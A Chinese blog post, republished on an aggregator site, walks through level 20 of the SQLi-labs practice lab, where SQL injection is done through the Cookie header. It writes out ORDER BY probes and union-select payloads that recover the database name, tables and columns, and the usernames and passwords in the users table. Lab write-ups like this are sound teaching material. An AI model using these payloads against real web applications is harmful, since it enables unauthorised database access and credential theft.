码迷,mamicode.com
首页 > 其他好文 > 详细

Less(20)POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

时间:2020-02-13 20:45:32      阅读:99      评论:0      收藏:0      [点我收藏+]

标签:mat   tab   技术   报错   erro   sed   database   gen   bsp   

1.单引号,报错型,cookie型注入。

  (1)登录后页面显示:

     技术图片

  (2)查看一下php文件

    技术图片

 

 

     可以看到查询语句查询cookee,那我们就在cookies里面进行注入

  (3)抓包看一下:

    技术图片

 

 

     看到cookie:uname=admin ,就可以以cookie注入了

  (4)加单引号发现:

    技术图片

 

 

     爆出语法错误,看得出来就是单引号型;

  (5)接下来查一下行数

    Cookie:uname=admin‘ order by 3 --+ //正常

 

 

 

    技术图片

 

 

 

   Cookie:uname=admin‘ order by 4 --+  //不正常

           技术图片

 

 

 2.爆破

  (1)爆库:Cookie:uname=-admin‘ union select 1,2,database() --+

    技术图片

 

   (2)爆表:Cookie:uname=-admin‘ union select 1,2,group_concat(table_name)from information_schema.tables where table_schema="security"  --+

    技术图片

 

  (3)爆列名:Cookie:uname=-admin‘ union select 1,2,group_concat(column_name)from information_schema.columns where table_name="users"   --+

    技术图片

 

   (4)爆值:Cookie:uname=-admin‘ union select 1,2,group_concat(username,0x7e,password)from security.users    --+

     技术图片

 

 

 

     

Less(20)POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

标签:mat   tab   技术   报错   erro   sed   database   gen   bsp   

原文地址:https://www.cnblogs.com/meng-yu37/p/12304945.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!